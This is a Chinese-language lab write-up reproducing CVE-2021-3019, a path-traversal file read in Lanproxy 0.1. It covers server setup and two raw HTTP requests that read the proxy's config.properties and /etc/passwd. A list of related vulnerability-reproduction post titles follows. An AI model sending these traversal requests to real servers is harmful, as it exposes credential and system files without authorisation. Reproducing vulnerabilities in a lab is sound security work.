Lanproxy任意文件读取漏洞复现(CVE-2021-3019)
声明
好好学习,天天向上
漏洞描述
影响范围
复现过程
这里使用0.1版本
下载地址,复现只下载服务端版本即可,放在一个已经配置好java环境的linux的服务器中,proxy-server-0.1.zip
https://file.nioee.com/d/2e81550ebdbd416c933f/
执行
unzip proxy-server-0.1.zip
mv proxy-server-0.1 /usr/local/
vim /usr/local/proxy-server-0.1/conf/config.properties
看到了配置文件,不做修改
启动服务
cd /usr/local/proxy-server-0.1/bin
chmod +x startup.sh
./startup.sh
环境启动后,访问
http://192.168.31.64:8090/
BP抓包,修改为如下,可以看到刚刚的那个配置文件
GET /../conf/config.properties HTTP/1.1
Host: 192.168.31.64:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
查看passwd,如果第二次半天出不来,可重新抓个包修改
GET /../../../../../../etc/passwd HTTP/1.1
Host: 192.168.31.64:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Lanproxy任意文件读取漏洞复现(CVE-2021-3019)相关推荐
- Apache Solr任意文件读取漏洞复现
Apache Solr任意文件读取漏洞复现 一.简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口.用户可以通过http请求,向搜索引擎服务器提交一定格 ...
- CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一.漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Fir ...
- Grafana 任意文件读取漏洞复现
一.漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 二.漏洞影响 Grafana 8.x 三.漏洞复现 可以从登陆页面看到版本信息为 v8.2. ...
- CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在 ...
- GitLab任意文件读取漏洞复现(CVE-2020-10977)
0x00简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务.GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git ...
- CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现
目录 1. 简介 2. 影响范围 3. 环境搭建 3.1 安装Composer 4. 漏洞复现 4.1 列举目录 4.2 任意文件读取 1. 简介 ThinkAdmin 是基于 ThinkPHP后台开 ...
- GateOne CVE-2020-35736 任意文件读取漏洞复现
0x00:简介 GateOne 是一款使用 HTML5 技术编写的网页版 SSH 终端模拟器.基于现代的 HTML5 技术,无需任何浏览器插件.支持多个 SSH 进程.可以嵌入到其他任意应用程序中.支 ...
- Grafana 未授权任意文件读取漏洞复现
1.fofa 批量搜索 app="Grafana" 漏洞URL: {{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../. ...
- Gitlab 任意文件读取漏洞 CVE-2016-9086 漏洞复现
Gitlab 任意文件读取漏洞(CVE-2016-9086) by ADummy 0x00利用路线 上传poc.tar.gz文件->读取到etc/passwd 0x01漏洞介绍 2018 ...
- CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞
CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞 目录 漏洞原理 漏洞信息 受影响版本 FOFA搜集相关资产 漏洞分析&漏洞复现 解决方案 漏洞原理 Grafana是一 ...
最新文章
- c# 取两个时间的间隔
- MATLAB获取一个目录中的所有文件
- 提审马甲包被拒问题记录
- RMI中部署时要注意的地方
- offsetLeft 解析
- C# 9.0 新功能一览
- 招聘 | 大疆算法类未来大咖招聘
- PulseAudio VS AudioFlinger(七)
- 系统常用 Intent 合集
- html编写在线打字通,HTML5代码打字练习、HTML5案例 - 03
- 2毫秒c51汇编语言延时函数,单片机精确毫秒延时函数
- 《迅雷链精品课》第十课:共识算法理论基础
- 电子不停车收费系统(ETC)专题(5)——最新动态
- 哈希表_实现插入、删除、查找元素操作(链地址法解决冲突)
- 能力素质有所欠缺_学有所思,思有所悟,悟有所行
- mysql日期时间类型
- win10下面搜索框无法搜索应用的解决方案
- linux查看磁盘是否SSD盘
- 国内高校课程资源汇总 2019.3
- Js逆向案例—网易云音乐